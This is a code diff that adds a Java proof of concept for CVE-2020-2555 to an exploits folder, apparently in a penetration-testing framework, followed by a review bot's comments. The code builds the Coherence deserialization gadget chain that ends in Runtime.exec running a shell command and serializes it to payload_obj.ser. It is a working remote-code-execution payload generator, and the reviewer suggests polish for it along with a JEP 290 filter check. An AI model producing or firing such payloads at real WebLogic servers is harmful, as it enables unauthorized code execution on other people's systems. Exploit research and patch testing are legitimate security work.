diff --git a/data/exploits/CVE-2020-2555/Weblogic_2555.java b/data/exploits/CVE-2020-2555/Weblogic_2555.java
new file mode 100644
index 0000000000..e4099349b6
--- /dev/null
+++ b/data/exploits/CVE-2020-2555/Weblogic_2555.java
@@ -0,0 +1,54 @@
+import com.tangosol.util.filter.LimitFilter;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+
+/*
+ * BadAttributeValueExpException.readObject()
+ * com.tangosol.util.filter.LimitFilter.toString()
+ * com.tangosol.util.extractor.ChainedExtractor.extract()
+ * com.tangosol.util.extractor.ReflectionExtractor.extract()
+ * Method.invoke()
+ * Runtime.exec()
+ *
+ * PoC by Y4er
+ */
+public class Weblogic_2555
+{
+ public static void main(String args[]) throws Exception
+ {
+ ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
+ ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
+ ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
+
+ ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
+ ChainedExtractor chainedExt = new ChainedExtractor(extractors);
+ LimitFilter limitFilter = new LimitFilter();
+
+ Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
+ m_comparator.setAccessible(true);
+ m_comparator.set(limitFilter, chainedExt);
+
+ Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
+ m_oAnchorTop.setAccessible(true);
+ m_oAnchorTop.set(limitFilter, Runtime.class);
+
+ BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
+ Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
+ field.setAccessible(true);
+ field.set(badAttributeValueExpException, limitFilter);
+
+ // Serialize object & save to file
+ FileOutputStream fos = new FileOutputStream("payload_obj.ser");
+ ObjectOutputStream os = new ObjectOutputStream(fos);
+ os.writeObject(badAttributeValueExpException);
+ os.close();
+
+ }
+}
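Review bot: The output streams at the end of `main` are closed only on the success path, so an exception from `writeObject` leaves `payload_obj.ser` open and possibly truncated; `try (ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("payload_obj.ser"))) { os.writeObject(badAttributeValueExpException); }` closes both in every case. `FileInputStream` and `ObjectInputStream` are imported but never used in this file and can be dropped. The header comment lists the call chain but not what the program itself does; I would add a line such as `Generator only: writes the serialized object to payload_obj.ser in the working directory and never deserializes it.` For readers who use the file as a test fixture, the same comment could note that a serialization filter (JEP 290) rejecting the `com.tangosol` classes named in the chain should cause the object to be refused, which is presumably the behaviour to verify on a patched or hardened host.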